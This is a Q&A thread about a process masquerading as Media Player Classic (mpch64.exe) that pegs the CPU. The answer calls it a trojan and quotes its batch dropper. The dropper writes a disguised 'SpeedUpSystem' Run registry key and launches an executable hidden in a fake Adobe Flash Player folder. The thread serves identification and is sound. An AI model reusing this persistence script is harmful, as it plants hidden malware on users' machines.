# My MPC started on its own and the process mpch64.exe was running at 100%, why?

Tags: cpu, process, kill, media-player-classic

I was working and all of a sudden heard my computer fan spinning extremely fast as if I was playing a 3D intensive game. I checked my processes and quickly discovered the culprit - mpch64.exe. My CPU had all cores at 100% except 1.

I was not running MPC at all prior to this, there were no windows open, it was as if it was running in the background. I checked for hard disk activity but it was negligible as far as any activity associated with mpch64.exe. Finally I killed the process.

What happened?!

Comment: which version do you use? Run ProcessExplorer and look which process is the parent (this tool started the program). If they provide Debug fiels (PDBs) you can use xperf to see which functions causes it. http://www.msfn.org/board/index.php?showtopic=140264

Comment: @magicandre1981 OK I will do that next time if it happens. Unfortunately I already killed it...

Answer (score 1):

This is a virus/trojan. File aso.bat in same folder is related as well.
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v SpeedUpSystem /d "wscript \"%appdata%\Adobe\Flash Player\SpeedCache\afile.vbs\" \"%appdata%\Adobe\Flash Player\SpeedCache\aso.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\SpeedCache\mpchc64.exe"